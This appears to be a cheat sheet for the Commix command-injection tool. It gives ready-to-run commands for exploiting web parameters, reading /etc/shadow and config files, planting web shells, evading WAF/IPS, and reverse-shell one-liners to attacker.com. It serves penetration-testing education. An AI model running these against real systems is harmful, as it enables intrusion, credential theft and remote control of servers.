
Commix

Installation

pip install commix
commix --version

From Git Repository

git clone https://github.com/commixproject/commix.git
cd commix
python3 commix.py --version

Kali Linux

sudo apt-get update
sudo apt-get install commix
commix --version

Docker

docker pull commixproject/commix:latest
docker run -it commixproject/commix:latest commix --version

Basic Usage

Simple URL Scan

commix -u "http://target.com/page.php?id=1"
commix -u "http://target.com/page.php?id=1" --technique=c

Test Specific Parameter

commix -u "http://target.com/vulnerable.php?cmd=id" -p cmd
commix -u "http://target.com/page.php" -p "id,name,email"

List Detection Techniques

commix --technique=?

Injection Techniques

Classic (Results-Based) Injection

# Direct output visible in response
commix -u "http://target.com/page.php?id=1" --technique=c
commix -u "http://target.com/page.php?id=1" -c "whoami"

# Payload structure: id=1 ; whoami

Eval-Based Injection

# Server-side code evaluation
commix -u "http://target.com/page.php?id=1" --technique=e
commix -u "http://target.com/page.php?id=1" --technique=e -c "id"

# Common in PHP eval(), Python exec()

Time-Based Blind Injection

# No output, detection via time delays
commix -u "http://target.com/page.php?id=1" --technique=t
commix -u "http://target.com/page.php?id=1" --technique=t --time-sec=5

# Payload: id=1 ; sleep(5) ; id

File-Based Blind Injection

# Write to accessible file, then retrieve
commix -u "http://target.com/page.php?id=1" --technique=f
commix -u "http://target.com/page.php?id=1" --technique=f --file-write="/var/www/html/shell.php"

POST Data and Body Injection

POST Parameter Testing

commix -u "http://target.com/login.php" --data="username=admin&password=test"
commix -u "http://target.com/api.php" --data="cmd=ls" -p cmd

JSON Body Injection

commix -u "http://target.com/api/search" \
  --data='{"query":"test","filter":"1"}' -p filter

Form Data Multipart

commix -u "http://target.com/upload.php" \
  --data="file=test.txt&name=admin" -p name
# Scan all cookies
commix -u "http://target.com/page.php" --cookie="session=abc123;role=user"

# Target specific cookie
commix -u "http://target.com/page.php" \
  --cookie="session=abc123;role=user" -p role
commix -u "http://target.com/page.php" \
  --cookie="id=1; path=/; domain=target.com" --technique=t

Header Injection

User-Agent Injection

commix -u "http://target.com/page.php?id=1" \
  --user-agent="Mozilla/5.0 (Commix Test)"

Custom Header Injection

commix -u "http://target.com/page.php" \
  --headers="X-Forwarded-For: 127.0.0.1" -p "X-Forwarded-For"

commix -u "http://target.com/api.php" \
  --headers="Authorization: Bearer token123" -p "Authorization"

Referer and Origin Headers

commix -u "http://target.com/page.php?id=1" \
  --referer="http://attacker.com"

Authentication

Basic Authentication

commix -u "http://target.com/admin/page.php?id=1" \
  --auth-type=basic --auth-cred="username:password"

Digest Authentication

commix -u "http://target.com/secure/page.php?id=1" \
  --auth-type=digest --auth-cred="admin:secretpass"

Bearer Token

commix -u "http://target.com/api/search.php" \
  --headers="Authorization: Bearer eyJhbGciOiJIUzI1NiJ9..."

Proxy and Network Configuration

Burp Suite Proxy

commix -u "http://target.com/page.php?id=1" \
  --proxy="http://127.0.0.1:8080"

Socks Proxy

commix -u "http://target.com/page.php?id=1" \
  --proxy="socks5://127.0.0.1:9050"

Custom Proxy Authentication

commix -u "http://target.com/page.php?id=1" \
  --proxy="http://user:pass@proxy.com:8080"

Disable SSL Verification

commix -u "https://target.com/page.php?id=1" --ssl-verify=false

Interactive Shell Access

Pseudo-Terminal Shell

commix -u "http://target.com/page.php?id=1" --os-shell
# Execute commands interactively
whoami
id
cat /etc/passwd

Full Shell vs Limited Shell

# Attempts to spawn full shell
commix -u "http://target.com/page.php?id=1" --os-shell --shell-type=bash

# Falls back to command-by-command execution

Exit Shell Session

exit
quit

File Operations

Read Remote Files

commix -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
commix -u "http://target.com/page.php?id=1" --file-read="/etc/shadow"
commix -u "http://target.com/page.php?id=1" --file-read="/var/www/html/config.php"

Write Files to Remote Server

# Write payload/shell to accessible directory
commix -u "http://target.com/page.php?id=1" \
  --file-write="/path/to/local/shell.php" \
  --file-dest="/var/www/html/uploads/shell.php"

Execute Uploaded Shell

# After file-write, access the uploaded file
curl http://target.com/uploads/shell.php?cmd=id

Custom Tamper Scripts

Create Custom Tamper Script

# Location: ~/.commix/tamper/custom_tamper.py
vim ~/.commix/tamper/custom_tamper.py

Example Tamper Script

# ~/.commix/tamper/base64encode.py
def tamper(payload):
    """Base64-encode the payload string before Commix sends it.

    Args:
        payload: the payload Commix hands to the tamper hook
            (assumes a ``str``, not ``bytes`` — TODO confirm against
            the tamper API of the Commix version in use).

    Returns:
        The UTF-8 bytes of ``payload`` encoded as a base64 ``str``.
    """
    import base64
    return base64.b64encode(payload.encode()).decode()

Apply Tamper Script

commix -u "http://target.com/page.php?id=1" \
  --tamper="base64encode"

# Multiple tampers
commix -u "http://target.com/page.php?id=1" \
  --tamper="base64encode,urlencoding"

Built-in Tamper Scripts

# View available tamper modules
commix --tamper-list

# Common tampers: space2plus, space2tab, comment, encoding

Filter Evasion and Encoding

Space Alternative Separators

commix -u "http://target.com/page.php?id=1" \
  --tamper="space2plus" -c "whoami"

commix -u "http://target.com/page.php?id=1" \
  --tamper="space2tab" -c "whoami"

Command Substitution

# Backticks: `whoami`
# Dollar syntax: $(whoami)
# Command substitution handled automatically by commix

URL Encoding Payloads

commix -u "http://target.com/page.php?id=1" \
  --tamper="urlencoding" -c "cat /etc/passwd"

Semicolon and Pipe Alternatives

# Standard: id ; whoami
# AND operator: id && whoami
# OR operator: id || whoami
# Pipe: id | base64

Character Encoding Bypass

commix -u "http://target.com/page.php?id=1" \
  --tamper="hexencode" -c "ls -la"

commix -u "http://target.com/page.php?id=1" \
  --tamper="base64encode" -c "whoami"

Common Vulnerable Parameters

Query String Parameters

# Common vulnerable parameters
commix -u "http://target.com/ping.php?ip=127.0.0.1" -p ip
commix -u "http://target.com/lookup.php?domain=example.com" -p domain
commix -u "http://target.com/convert.php?url=file:///etc/passwd" -p url

Search and Filter Parameters

commix -u "http://target.com/search.php?q=test&sort=id" -p "q,sort"
commix -u "http://target.com/filter.php?category=admin&type=user" -p "category,type"

Upload and File Parameters

commix -u "http://target.com/process.php?file=upload.txt"
commix -u "http://target.com/convert.php?input=file.pdf"

Burp Suite Integration

Manual Request in Burp

# 1. Capture request in Burp Proxy
# 2. Copy to clipboard or save to file
# 3. Use Commix with request file

commix -r burp_request.txt

Burp Collaborator Integration

# Use Burp Collaborator for blind injection detection
commix -u "http://target.com/page.php?id=1" \
  --technique=t \
  --time-sec=10

Export Results

commix -u "http://target.com/page.php?id=1" \
  --batch \
  --output-dir="./results/"

Advanced Options

Batch Mode (Non-Interactive)

commix -u "http://target.com/page.php?id=1" --batch
commix -u "http://target.com/page.php?id=1" --batch -c "id"

Force Specific Technique

# Skip detection, force specific technique
commix -u "http://target.com/page.php?id=1" --technique=c --force

Verbosity and Logging

# Verbose output
commix -u "http://target.com/page.php?id=1" -v

# Very verbose
commix -u "http://target.com/page.php?id=1" -vv

# Save output to file
commix -u "http://target.com/page.php?id=1" --output-dir="./logs/"

Crawling and Scope

# Crawl website for parameters
commix -u "http://target.com/" --crawl=2

# Specify threads
commix -u "http://target.com/page.php?id=1" --threads=10

Custom Delay and Timeouts

# Add delay between requests
commix -u "http://target.com/page.php?id=1" --delay=2

# Set timeout for responses
commix -u "http://target.com/page.php?id=1" --timeout=30

# Time-based blind injection delay
commix -u "http://target.com/page.php?id=1" --technique=t --time-sec=10

Workflow Examples

Full Assessment

# 1. Test all parameters with auto detection
commix -u "http://target.com/page.php?id=1&name=test" --batch

# 2. Identify injection point and technique
# (Commix outputs results)

# 3. Gain interactive shell
commix -u "http://target.com/page.php?id=1" --os-shell

# 4. Read sensitive files
commix -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"

Blind Injection Exploitation

# 1. Detect with time-based
commix -u "http://target.com/blind.php?id=1" --technique=t

# 2. Verify vulnerability
commix -u "http://target.com/blind.php?id=1" --technique=t -c "whoami"

# 3. Exfiltrate data via file-write or OOB channel
commix -u "http://target.com/blind.php?id=1" \
  --file-write="exfil.php" --file-dest="/var/www/html/"

Evading WAF/IPS

# 1. Test multiple tamper techniques
commix -u "http://target.com/page.php?id=1" \
  --tamper="space2plus,comment" --technique=t

# 2. Adjust timing
commix -u "http://target.com/page.php?id=1" --delay=5 --timeout=60

# 3. Use encoding
commix -u "http://target.com/page.php?id=1" --tamper="hexencode"

Common Payloads and Tests

Information Gathering

whoami          # Current user
id              # User and group IDs
pwd             # Current directory
uname -a        # System information
cat /etc/os-release  # OS details

File System Enumeration

ls -la          # List with hidden files
cat /etc/passwd # User enumeration
find / -type f -name "*.php" 2>/dev/null  # Find PHP files

Reverse Shell Patterns

bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc attacker.com 4444 -e /bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.Popen(["/bin/sh","-i"]);p.wait()'

Troubleshooting

No Vulnerability Detected

# Verify parameter is vulnerable manually
# Test with manual payload first
# Try different techniques: --technique=c,e,t,f

# Check if filtering is in place
commix -u "http://target.com/page.php?id=1" --tamper="space2plus"

False Positives

# Use --force to skip detection
commix -u "http://target.com/page.php?id=1" --force -c "id"

# Test with known working payload
commix -u "http://target.com/page.php?id=1" -c "whoami" --technique=c

Timeout Issues

# Increase timeout
commix -u "http://target.com/page.php?id=1" --timeout=60

# Reduce threads
commix -u "http://target.com/page.php?id=1" --threads=1

Proxy Errors

# Verify proxy is running
# Check proxy authentication
commix -u "http://target.com/page.php?id=1" \
  --proxy="http://user:pass@proxy:8080" -v

Tips and Best Practices

  1. Always get authorization before testing on any system
  2. Test locally first with intentionally vulnerable apps (DVWA, WebGoat)
  3. Use Burp Suite to capture real requests and refine parameters
  4. Start with simple payloads before complex encoding/tamper scripts
  5. Document findings with screenshots and proof-of-concept commands
  6. Respect scope and only test authorized parameters
  7. Use time delays carefully to avoid IDS/IPS detection on time-based blinds
  8. Clean up after testing - remove uploaded shells and any other test artifacts; agree log handling with the system owner beforehand rather than clearing logs unilaterally, since those entries are the owner's record of the test